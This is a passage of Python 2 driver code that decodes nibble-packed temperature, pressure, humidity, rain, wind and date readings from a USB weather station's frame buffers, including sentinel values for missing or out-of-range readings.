        7: "SSE", 8: "S", 9: "SSW", 10: "SW", 11: "WSW", 12: "W",
        13: "WNW", 14: "NW", 15: "NNW", 16: "err", 17: "inv", 18: "None" }
    forecastMap = {
        0: "Rainy(Bad)", 1: "Cloudy(Neutral)", 2: "Sunny(Good)",  3: "Error" }
    trendMap = {
        0: "Stable(Neutral)", 1: "Rising(Up)", 2: "Falling(Down)", 3: "Error" }

    @staticmethod
    def TemperatureNP():
        """Sentinel: temperature not present."""
        return 81.099998

    @staticmethod
    def TemperatureOFL():
        """Sentinel: temperature outside factory limits."""
        return 136.0

    @staticmethod
    def PressureNP():
        """Sentinel: pressure not present."""
        return 10101010.0

    @staticmethod
    def PressureOFL():
        """Sentinel: pressure outside factory limits."""
        return 16666.5

    @staticmethod
    def HumidityNP():
        """Sentinel: humidity not present."""
        return 110.0

    @staticmethod
    def HumidityOFL():
        """Sentinel: humidity outside factory limits."""
        return 121.0

    @staticmethod
    def RainNP():
        """Sentinel: rain not present."""
        return -0.2

    @staticmethod
    def RainOFL():
        """Sentinel: rain outside factory limits."""
        return 16666.664

    @staticmethod
    def WindNP():
        """Sentinel: wind not present."""
        return 183.6 # km/h = 51.0 m/s

    @staticmethod
    def WindOFL():
        """Sentinel: wind outside factory limits."""
        return 183.96 # km/h = 51.099998 m/s

    @staticmethod
    def TemperatureOffset():
        """Offset subtracted from raw temperature nibble values."""
        return 40.0

class CMeasurement:
    """One measured value plus its error/overflow flags and timestamp.

    Defaults represent the unset state; Reset() restores it (note it
    deliberately leaves _Time untouched, as in the original).
    """
    _Value = 0.0
    _ResetFlag = 23
    _IsError = 1
    _IsOverflow = 1
    _Time = None

    def Reset(self):
        """Return the measurement to its default (unset) state."""
        (self._Value, self._ResetFlag,
         self._IsError, self._IsOverflow) = (0.0, 23, 1, 1)

class CMinMaxMeasurement(object):
    """Pair of CMeasurement objects holding a minimum and a maximum."""
    def __init__(self):
        self._Min = CMeasurement()
        self._Max = CMeasurement()

# firmware XXX has bogus date values for these fields
_bad_labels = ['RainLastMonthMax','RainLastWeekMax','PressureRelativeMin']

class USBHardware(object):
    """Decoders for the nibble-packed (BCD-style) values in the station's
    USB frame buffers.

    Conventions shared by all methods: ``buf`` is a one-element list
    whose first item is the byte sequence; ``start`` is a byte offset
    into it; ``StartOnHiNibble`` selects whether the value begins in the
    high or the low nibble of the first byte.  A digit nibble of 15
    (0xF) marks an overflow (OFL) reading; digits 10..14 mark an
    error / not-present (NP) reading.
    """
    @staticmethod
    def isOFL2(buf, start, StartOnHiNibble):
        # True if either of 2 nibbles is the overflow marker (0xF).
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) == 15 \
                or (buf[0][start+0] & 0xF) == 15
        else:
            result = (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15
        return result

    @staticmethod
    def isOFL3(buf, start, StartOnHiNibble):
        # True if any of 3 nibbles is the overflow marker (0xF).
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) == 15 \
                or (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15
        else:
            result = (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15 \
                or (buf[0][start+1] & 0xF) == 15
        return result

    @staticmethod
    def isOFL5(buf, start, StartOnHiNibble):
        # True if any of 5 nibbles is the overflow marker (0xF).
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) == 15 \
                or (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15 \
                or (buf[0][start+1] & 0xF) == 15 \
                or (buf[0][start+2] >>  4) == 15
        else:
            result = (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15 \
                or (buf[0][start+1] & 0xF) == 15 \
                or (buf[0][start+2] >>  4) == 15 \
                or (buf[0][start+2] & 0xF) == 15
        return result

    @staticmethod
    def isErr2(buf, start, StartOnHiNibble):
        # True if either of 2 nibbles is an error digit (10..14).
        # NOTE: relies on 'and' binding tighter than 'or'.
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) >= 10 \
                and (buf[0][start+0] >>  4) != 15 \
                or  (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15
        else:
            result = (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15
        return result

    @staticmethod
    def isErr3(buf, start, StartOnHiNibble):
        # True if any of 3 nibbles is an error digit (10..14).
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) >= 10 \
                and (buf[0][start+0] >>  4) != 15 \
                or  (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15
        else:
            result = (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15 \
                or  (buf[0][start+1] & 0xF) >= 10 \
                and (buf[0][start+1] & 0xF) != 15
        return result

    @staticmethod
    def isErr5(buf, start, StartOnHiNibble):
        # True if any of 5 nibbles is an error digit (10..14).
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) >= 10 \
                and (buf[0][start+0] >>  4) != 15 \
                or  (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15 \
                or  (buf[0][start+1] & 0xF) >= 10 \
                and (buf[0][start+1] & 0xF) != 15 \
                or  (buf[0][start+2] >>  4) >= 10 \
                and (buf[0][start+2] >>  4) != 15
        else:
            result = (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15 \
                or  (buf[0][start+1] & 0xF) >= 10 \
                and (buf[0][start+1] & 0xF) != 15 \
                or  (buf[0][start+2] >>  4) >= 10 \
                and (buf[0][start+2] >>  4) != 15 \
                or  (buf[0][start+2] & 0xF) >= 10 \
                and (buf[0][start+2] & 0xF) != 15
        return result

    @staticmethod
    def reverseByteOrder(buf, start, Count):
        """Reverse Count bytes of buf[0] in place, starting at 'start'."""
        # NOTE: xrange -- this module is Python 2 code.
        nbuf=buf[0]
        for i in xrange(0, Count >> 1):
            tmp = nbuf[start + i]
            nbuf[start + i] = nbuf[start + Count - i - 1]
            nbuf[start + Count - i - 1 ] = tmp
        buf[0]=nbuf

    @staticmethod
    def readWindDirectionShared(buf, start):
        # Two direction indices packed in one byte: (low nibble, high nibble).
        return (buf[0][0+start] & 0xF, buf[0][start] >> 4)

    @staticmethod
    def toInt_2(buf, start, StartOnHiNibble):
        """read 2 nibbles as a two-digit decimal integer"""
        if StartOnHiNibble:
            rawpre  = (buf[0][start+0] >>  4)* 10 \
                + (buf[0][start+0] & 0xF)* 1
        else:
            rawpre  = (buf[0][start+0] & 0xF)* 10 \
                + (buf[0][start+1] >>  4)* 1
        return rawpre

    @staticmethod
    def toRain_7_3(buf, start, StartOnHiNibble):
        """read 7 nibbles, presentation with 3 decimals; units of mm"""
        if (USBHardware.isErr2(buf, start+0, StartOnHiNibble) or
            USBHardware.isErr5(buf, start+1, StartOnHiNibble)):
            result = CWeatherTraits.RainNP()
        elif (USBHardware.isOFL2(buf, start+0, StartOnHiNibble) or
              USBHardware.isOFL5(buf, start+1, StartOnHiNibble)):
            result = CWeatherTraits.RainOFL()
        elif StartOnHiNibble:
            result  = (buf[0][start+0] >>  4)*  1000 \
                + (buf[0][start+0] & 0xF)* 100    \
                + (buf[0][start+1] >>  4)*  10    \
                + (buf[0][start+1] & 0xF)*   1    \
                + (buf[0][start+2] >>  4)*   0.1  \
                + (buf[0][start+2] & 0xF)*   0.01 \
                + (buf[0][start+3] >>  4)*   0.001
        else:
            result  = (buf[0][start+0] & 0xF)*  1000 \
                + (buf[0][start+1] >>  4)* 100    \
                + (buf[0][start+1] & 0xF)*  10    \
                + (buf[0][start+2] >>  4)*   1    \
                + (buf[0][start+2] & 0xF)*   0.1  \
                + (buf[0][start+3] >>  4)*   0.01 \
                + (buf[0][start+3] & 0xF)*   0.001
        return result

    @staticmethod
    def toRain_6_2(buf, start, StartOnHiNibble):
        '''read 6 nibbles, presentation with 2 decimals; units of mm'''
        if (USBHardware.isErr2(buf, start+0, StartOnHiNibble) or
            USBHardware.isErr2(buf, start+1, StartOnHiNibble) or
            USBHardware.isErr2(buf, start+2, StartOnHiNibble) ):
            result = CWeatherTraits.RainNP()
        elif (USBHardware.isOFL2(buf, start+0, StartOnHiNibble) or
              USBHardware.isOFL2(buf, start+1, StartOnHiNibble) or
              USBHardware.isOFL2(buf, start+2, StartOnHiNibble)):
            result = CWeatherTraits.RainOFL()
        elif StartOnHiNibble:
            result  = (buf[0][start+0] >>  4)*  1000 \
                + (buf[0][start+0] & 0xF)* 100   \
                + (buf[0][start+1] >>  4)*  10   \
                + (buf[0][start+1] & 0xF)*   1   \
                + (buf[0][start+2] >>  4)*   0.1 \
                + (buf[0][start+2] & 0xF)*   0.01
        else:
            result  = (buf[0][start+0] & 0xF)*  1000 \
                + (buf[0][start+1] >>  4)* 100   \
                + (buf[0][start+1] & 0xF)*  10   \
                + (buf[0][start+2] >>  4)*   1   \
                + (buf[0][start+2] & 0xF)*   0.1 \
                + (buf[0][start+3] >>  4)*   0.01
        return result

    @staticmethod
    def toRain_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal; raw value in units
        of 0.1 inch, returned in mm"""
        if StartOnHiNibble:
            hibyte = buf[0][start+0]
            lobyte = (buf[0][start+1] >> 4) & 0xF
        else:
            hibyte = 16*(buf[0][start+0] & 0xF) + ((buf[0][start+1] >> 4) & 0xF)
            lobyte = buf[0][start+1] & 0xF
        # 0xFFE / 0xFFF are the not-present / overflow bit patterns
        if hibyte == 0xFF and lobyte == 0xE :
            result = CWeatherTraits.RainNP()
        elif hibyte == 0xFF and lobyte == 0xF :
            result = CWeatherTraits.RainOFL()
        else:
            val = USBHardware.toFloat_3_1(buf, start, StartOnHiNibble) # 0.1 inch
            result = val * 2.54 # mm
        return result

    @staticmethod
    def toFloat_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles as a hex-weighted value, presentation with 1 decimal"""
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4)*16**2 \
                + (buf[0][start+0] & 0xF)*   16**1 \
                + (buf[0][start+1] >>  4)*   16**0
        else:
            result = (buf[0][start+0] & 0xF)*16**2 \
                + (buf[0][start+1] >>  4)*   16**1 \
                + (buf[0][start+1] & 0xF)*   16**0
        result = result / 10.0
        return result

    @staticmethod
    def toDateTime(buf, start, StartOnHiNibble, label):
        """read 10 nibbles (YYMMDDHHMM, two digits each), presentation as
        DateTime; 'label' is used only for error reporting"""
        result = None
        if (USBHardware.isErr2(buf, start+0, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+1, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+2, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+3, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+4, StartOnHiNibble)):
            logerr('ToDateTime: bogus date for %s: error status in buffer' %
                   label)
        else:
            year    = USBHardware.toInt_2(buf, start+0, StartOnHiNibble) + 2000
            month   = USBHardware.toInt_2(buf, start+1, StartOnHiNibble)
            days    = USBHardware.toInt_2(buf, start+2, StartOnHiNibble)
            hours   = USBHardware.toInt_2(buf, start+3, StartOnHiNibble)
            minutes = USBHardware.toInt_2(buf, start+4, StartOnHiNibble)
            try:
                result = datetime(year, month, days, hours, minutes)
            except ValueError:
                # suppress the log noise for fields known to carry bogus
                # dates on some firmware (_bad_labels)
                if label not in _bad_labels:
                    logerr(('ToDateTime: bogus date for %s:'
                            ' bad date conversion from'
                            ' %s %s %s %s %s') %
                           (label, minutes, hours, days, month, year))
        if result is None:
            # FIXME: use None instead of a really old date to indicate invalid
            # (octal-style int literals below: Python 2 syntax)
            result = datetime(1900, 01, 01, 00, 00)
        return result

    @staticmethod
    def toHumidity_2_0(buf, start, StartOnHiNibble):
        """read 2 nibbles, presentation with 0 decimal; percent"""
        if USBHardware.isErr2(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.HumidityNP()
        elif USBHardware.isOFL2(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.HumidityOFL()
        else:
            result = USBHardware.toInt_2(buf, start, StartOnHiNibble)
        return result

    @staticmethod
    def toTemperature_5_3(buf, start, StartOnHiNibble):
        """read 5 nibbles, presentation with 3 decimals; units of degree C"""
        if USBHardware.isErr5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureNP()
        elif USBHardware.isOFL5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureOFL()
        else:
            if StartOnHiNibble:
                rawtemp = (buf[0][start+0] >>  4)* 10 \
                    + (buf[0][start+0] & 0xF)*  1     \
                    + (buf[0][start+1] >>  4)*  0.1   \
                    + (buf[0][start+1] & 0xF)*  0.01  \
                    + (buf[0][start+2] >>  4)*  0.001
            else:
                rawtemp = (buf[0][start+0] & 0xF)* 10 \
                    + (buf[0][start+1] >>  4)*  1     \
                    + (buf[0][start+1] & 0xF)*  0.1   \
                    + (buf[0][start+2] >>  4)*  0.01  \
                    + (buf[0][start+2] & 0xF)*  0.001
            # raw value is biased by the station's fixed offset
            result = rawtemp - CWeatherTraits.TemperatureOffset()
        return result

    @staticmethod
    def toTemperature_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal; units of degree C"""
        if USBHardware.isErr3(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureNP()
        elif USBHardware.isOFL3(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureOFL()
        else:
            if StartOnHiNibble :
                rawtemp   =  (buf[0][start+0] >>  4)*  10 \
                    +  (buf[0][start+0] & 0xF)*  1   \
                    +  (buf[0][start+1] >>  4)*  0.1
            else:
                rawtemp   =  (buf[0][start+0] & 0xF)*  10 \
                    +  (buf[0][start+1] >>  4)*  1   \
                    +  (buf[0][start+1] & 0xF)*  0.1
            result = rawtemp - CWeatherTraits.TemperatureOffset()
        return result

    @staticmethod
    def toWindspeed_6_2(buf, start):
        """read 6 nibbles (hex-weighted), presentation with 2 decimals;
        units of km/h"""
        result = (buf[0][start+0] >> 4)* 16**5 \
            + (buf[0][start+0] & 0xF)*   16**4 \
            + (buf[0][start+1] >>  4)*   16**3 \
            + (buf[0][start+1] & 0xF)*   16**2 \
            + (buf[0][start+2] >>  4)*   16**1 \
            + (buf[0][start+2] & 0xF)
        result /= 256.0
        result /= 100.0             # km/h
        return result

    @staticmethod
    def toWindspeed_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal; raw value in m/s,
        returned in km/h"""
        if StartOnHiNibble :
            hibyte = buf[0][start+0]
            lobyte = (buf[0][start+1] >> 4) & 0xF
        else:
            hibyte = 16*(buf[0][start+0] & 0xF) + ((buf[0][start+1] >> 4) & 0xF)
            lobyte = buf[0][start+1] & 0xF
        # 0xFFE / 0xFFF are the not-present / overflow bit patterns
        if hibyte == 0xFF and lobyte == 0xE:
            result = CWeatherTraits.WindNP()
        elif hibyte == 0xFF and lobyte == 0xF:
            result = CWeatherTraits.WindOFL()
        else:
            result = USBHardware.toFloat_3_1(buf, start, StartOnHiNibble) # m/s
            result *= 3.6 # km/h
        return result

    @staticmethod
    def readPressureShared(buf, start, StartOnHiNibble):
        # Returns (hPa, inHg); the hPa value is stored with the opposite
        # nibble alignment, 2 bytes further along.
        return (USBHardware.toPressure_hPa_5_1(buf,start+2,1-StartOnHiNibble),
                USBHardware.toPressure_inHg_5_2(buf,start,StartOnHiNibble))

    @staticmethod
    def toPressure_hPa_5_1(buf, start, StartOnHiNibble):
        """read 5 nibbles, presentation with 1 decimal; units of hPa (mbar)"""
        if USBHardware.isErr5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureNP()
        elif USBHardware.isOFL5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureOFL()
        elif StartOnHiNibble :
            result = (buf[0][start+0] >> 4)* 1000 \
                + (buf[0][start+0] & 0xF)* 100  \
                + (buf[0][start+1] >>  4)*  10  \
                + (buf[0][start+1] & 0xF)*  1   \
                + (buf[0][start+2] >>  4)*  0.1
        else:
            result = (buf[0][start+0] & 0xF)* 1000 \
                + (buf[0][start+1] >>  4)* 100  \
                + (buf[0][start+1] & 0xF)*  10  \
                + (buf[0][start+2] >>  4)*  1   \
                + (buf[0][start+2] & 0xF)*  0.1
        return result

    @staticmethod
    def toPressure_inHg_5_2(buf, start, StartOnHiNibble):
        """read 5 nibbles, presentation with 2 decimals; units of inHg"""
        if USBHardware.isErr5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureNP()
        elif USBHardware.isOFL5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureOFL()
        elif StartOnHiNibble :
            result = (buf[0][start+0] >> 4)* 100 \
                + (buf[0][start+0] & 0xF)* 10   \
                + (buf[0][start+1] >>  4)*  1   \
                + (buf[0][start+1] & 0xF)*  0.1 \
                + (buf[0][start+2] >>  4)*  0.01
        else:
            result = (buf[0][start+0] & 0xF)* 100 \
                + (buf[0][start+1] >>  4)* 10   \
                + (buf[0][start+1] & 0xF)*  1   \
                + (buf[0][start+2] >>  4)*  0.1 \
                + (buf[0][start+2] & 0xF)*  0.01
        return result


class CCurrentWeatherData(object):

    def __init__(self):
        self._timestamp = None
        self._checksum = None
        self._PressureRelative_hPa = CWeatherTraits.PressureNP()
        self._PressureRelative_hPaMinMax = CMinMaxMeasurement()
        self._PressureRelative_inHg = CWeatherTraits.PressureNP()
        self._PressureRelative_inHgMinMax = CMinMaxMeasurement()
        self._WindSpeed = CWeatherTraits.WindNP()
        self._WindDirection = EWindDirection.wdNone
        self._WindDirection1 = EWindDirection.wdNone
        self._WindDirection2 = EWindDirection.wdNone
        self._WindDirection3 = EWindDirection.wdNone
        self._WindDirection4 = EWindDirection.wdNone
        self._WindDirection5 = EWindDirection.wdNone
        self._Gust = CWeatherTraits.WindNP()
        self._GustMax = CMinMaxMeasurement()
        self._GustDirection = EWindDirection.wdNone
        self._GustDirection1 = EWindDirection.wdNone
        self._GustDirection2 = EWindDirection.wdNone
        self._GustDirection3 = EWindDirection.wdNone
        self._GustDirection4 = EWindDirection.wdNone
        self._GustDirection5 = EWindDirection.wdNone
        self._Rain1H = CWeatherTraits.RainNP()
        self._Rain1HMax = CMinMaxMeasurement()
        self._Rain24H = CWeatherTraits.RainNP()
        self._Rain24HMax = CMinMaxMeasurement()
        self._RainLastWeek = CWeatherTraits.RainNP()
        self._RainLastWeekMax = CMinMaxMeasurement()
        self._RainLastMonth = CWeatherTraits.RainNP()
        self._RainLastMonthMax = CMinMaxMeasurement()
        self._RainTotal = CWeatherTraits.RainNP()
        self._LastRainReset = None
        self._TempIndoor = CWeatherTraits.TemperatureNP()
        self._TempIndoorMinMax = CMinMaxMeasurement()
        self._TempOutdoor = CWeatherTraits.TemperatureNP()
        self._TempOutdoorMinMax = CMinMaxMeasurement()
        self._HumidityIndoor = CWeatherTraits.HumidityNP()
        self._HumidityIndoorMinMax = CMinMaxMeasurement()
        self._HumidityOutdoor = CWeatherTraits.HumidityNP()
        self._HumidityOutdoorMinMax = CMinMaxMeasurement()
        self._Dewpoint = CWeatherTraits.TemperatureNP()
        self._DewpointMinMax = CMinMaxMeasurement()
        self._Windchill = CWeatherTraits.TemperatureNP()
        self._WindchillMinMax = CMinMaxMeasurement()
        self._WeatherState = EWeatherState.WEATHER_ERR
        self._WeatherTendency = EWeatherTendency.TREND_ERR
        self._AlarmRingingFlags = 0
        self._AlarmMarkedFlags = 0
        self._PresRel_hPa_Max = 0.0
        self._PresRel_inHg_Max = 0.0

    @staticmethod
    def calcChecksum(buf):
        return calc_checksum(buf, 6)

    def checksum(self):
        return self._checksum

    def read(self, buf):
        self._timestamp = int(time.time() + 0.5)
        self._checksum = CCurrentWeatherData.calcChecksum(buf)

        nbuf = [0]
        nbuf[0] = buf[0]
        self._StartBytes = nbuf[0][6]*0xF + nbuf[0][7] # FIXME: what is this?
        self._WeatherTendency = (nbuf[0][8] >> 4) & 0xF
        if self._WeatherTendency > 3:
            self._WeatherTendency = 3 
        self._WeatherState = nbuf[0][8] & 0xF
        if self._WeatherState > 3:
            self._WeatherState = 3 

        self._TempIndoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 19, 0)
        self._TempIndoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 22, 1)
        self._TempIndoor = USBHardware.toTemperature_5_3(nbuf, 24, 0)
        self._TempIndoorMinMax._Min._IsError = (self._TempIndoorMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._TempIndoorMinMax._Min._IsOverflow = (self._TempIndoorMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._TempIndoorMinMax._Max._IsError = (self._TempIndoorMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._TempIndoorMinMax._Max._IsOverflow = (self._TempIndoorMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._TempIndoorMinMax._Max._Time = None if self._TempIndoorMinMax._Max._IsError or self._TempIndoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 9, 0, 'TempIndoorMax')
        self._TempIndoorMinMax._Min._Time = None if self._TempIndoorMinMax._Min._IsError or self._TempIndoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 14, 0, 'TempIndoorMin')

        self._TempOutdoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 37, 0)
        self._TempOutdoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 40, 1)
        self._TempOutdoor = USBHardware.toTemperature_5_3(nbuf, 42, 0)
        self._TempOutdoorMinMax._Min._IsError = (self._TempOutdoorMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._TempOutdoorMinMax._Min._IsOverflow = (self._TempOutdoorMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._TempOutdoorMinMax._Max._IsError = (self._TempOutdoorMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._TempOutdoorMinMax._Max._IsOverflow = (self._TempOutdoorMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._TempOutdoorMinMax._Max._Time = None if self._TempOutdoorMinMax._Max._IsError or self._TempOutdoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 27, 0, 'TempOutdoorMax')
        self._TempOutdoorMinMax._Min._Time = None if self._TempOutdoorMinMax._Min._IsError or self._TempOutdoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 32, 0, 'TempOutdoorMin')

        self._WindchillMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 55, 0)
        self._WindchillMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 58, 1)
        self._Windchill = USBHardware.toTemperature_5_3(nbuf, 60, 0)
        self._WindchillMinMax._Min._IsError = (self._WindchillMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._WindchillMinMax._Min._IsOverflow = (self._WindchillMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._WindchillMinMax._Max._IsError = (self._WindchillMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._WindchillMinMax._Max._IsOverflow = (self._WindchillMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._WindchillMinMax._Max._Time = None if self._WindchillMinMax._Max._IsError or self._WindchillMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 45, 0, 'WindchillMax')
        self._WindchillMinMax._Min._Time = None if self._WindchillMinMax._Min._IsError or self._WindchillMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 50, 0, 'WindchillMin')

        self._DewpointMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 73, 0)
        self._DewpointMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 76, 1)
        self._Dewpoint = USBHardware.toTemperature_5_3(nbuf, 78, 0)
        self._DewpointMinMax._Min._IsError = (self._DewpointMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._DewpointMinMax._Min._IsOverflow = (self._DewpointMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._DewpointMinMax._Max._IsError = (self._DewpointMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._DewpointMinMax._Max._IsOverflow = (self._DewpointMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._DewpointMinMax._Min._Time = None if self._DewpointMinMax._Min._IsError or self._DewpointMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 68, 0, 'DewpointMin')
        self._DewpointMinMax._Max._Time = None if self._DewpointMinMax._Max._IsError or self._DewpointMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 63, 0, 'DewpointMax')

        self._HumidityIndoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 91, 1)
        self._HumidityIndoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 92, 1)
        self._HumidityIndoor = USBHardware.toHumidity_2_0(nbuf, 93, 1)
        self._HumidityIndoorMinMax._Min._IsError = (self._HumidityIndoorMinMax._Min._Value == CWeatherTraits.HumidityNP())
        self._HumidityIndoorMinMax._Min._IsOverflow = (self._HumidityIndoorMinMax._Min._Value == CWeatherTraits.HumidityOFL())
        self._HumidityIndoorMinMax._Max._IsError = (self._HumidityIndoorMinMax._Max._Value == CWeatherTraits.HumidityNP())
        self._HumidityIndoorMinMax._Max._IsOverflow = (self._HumidityIndoorMinMax._Max._Value == CWeatherTraits.HumidityOFL())
        self._HumidityIndoorMinMax._Max._Time = None if self._HumidityIndoorMinMax._Max._IsError or self._HumidityIndoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 81, 1, 'HumidityIndoorMax')
        self._HumidityIndoorMinMax._Min._Time = None if self._HumidityIndoorMinMax._Min._IsError or self._HumidityIndoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 86, 1, 'HumidityIndoorMin')

        self._HumidityOutdoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 104, 1)
        self._HumidityOutdoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 105, 1)
        self._HumidityOutdoor = USBHardware.toHumidity_2_0(nbuf, 106, 1)
        self._HumidityOutdoorMinMax._Min._IsError = (self._HumidityOutdoorMinMax._Min._Value == CWeatherTraits.HumidityNP())
        self._HumidityOutdoorMinMax._Min._IsOverflow = (self._HumidityOutdoorMinMax._Min._Value == CWeatherTraits.HumidityOFL())
        self._HumidityOutdoorMinMax._Max._IsError = (self._HumidityOutdoorMinMax._Max._Value == CWeatherTraits.HumidityNP())
        self._HumidityOutdoorMinMax._Max._IsOverflow = (self._HumidityOutdoorMinMax._Max._Value == CWeatherTraits.HumidityOFL())
        self._HumidityOutdoorMinMax._Max._Time = None if self._HumidityOutdoorMinMax._Max._IsError or self._HumidityOutdoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 94, 1, 'HumidityOutdoorMax')
        self._HumidityOutdoorMinMax._Min._Time = None if self._HumidityOutdoorMinMax._Min._IsError or self._HumidityOutdoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 99, 1, 'HumidityOutdoorMin')

        self._RainLastMonthMax._Max._Time = USBHardware.toDateTime(nbuf, 107, 1, 'RainLastMonthMax')
        self._RainLastMonthMax._Max._Value = USBHardware.toRain_6_2(nbuf, 112, 1)
        self._RainLastMonth = USBHardware.toRain_6_2(nbuf, 115, 1)

        self._RainLastWeekMax._Max._Time = USBHardware.toDateTime(nbuf, 118, 1, 'RainLastWeekMax')
        self._RainLastWeekMax._Max._Value = USBHardware.toRain_6_2(nbuf, 123, 1)
        self._RainLastWeek = USBHardware.toRain_6_2(nbuf, 126, 1)

        self._Rain24HMax._Max._Time = USBHardware.toDateTime(nbuf, 129, 1, 'Rain24HMax')
        self._Rain24HMax._Max._Value = USBHardware.toRain_6_2(nbuf, 134, 1)
        self._Rain24H = USBHardware.toRain_6_2(nbuf, 137, 1)
        
        self._Rain1HMax._Max._Time = USBHardware.toDateTime(nbuf, 140, 1, 'Rain1HMax')
        self._Rain1HMax._Max._Value = USBHardware.toRain_6_2(nbuf, 145, 1)
        self._Rain1H = USBHardware.toRain_6_2(nbuf, 148, 1)

        self._LastRainReset = USBHardware.toDateTime(nbuf, 151, 0, 'LastRainReset')
        self._RainTotal = USBHardware.toRain_7_3(nbuf, 156, 0)

        (w ,w1) = USBHardware.readWindDirectionShared(nbuf, 162)
        (w2,w3) = USBHardware.readWindDirectionShared(nbuf, 161)
        (w4,w5) = USBHardware.readWindDirectionShared(nbuf, 160)
        self._WindDirection = w
        self._WindDirection1 = w1
        self._WindDirection2 = w2
        self._WindDirection3 = w3
        self._WindDirection4 = w4
        self._WindDirection5 = w5

        if DEBUG_WEATHER_DATA > 2:
            unknownbuf = [0]*9
            for i in xrange(0,9):
                unknownbuf[i] = nbuf[163+i]
            strbuf = ""
            for i in unknownbuf:
                strbuf += str("%.2x " % i)
            logdbg('Bytes with unknown meaning at 157-165: %s' % strbuf)

        self._WindSpeed = USBHardware.toWindspeed_6_2(nbuf, 172)

        # FIXME: read the WindErrFlags
        (g ,g1) = USBHardware.readWindDirectionShared(nbuf, 177)
        (g2,g3) = USBHardware.readWindDirectionShared(nbuf, 176)
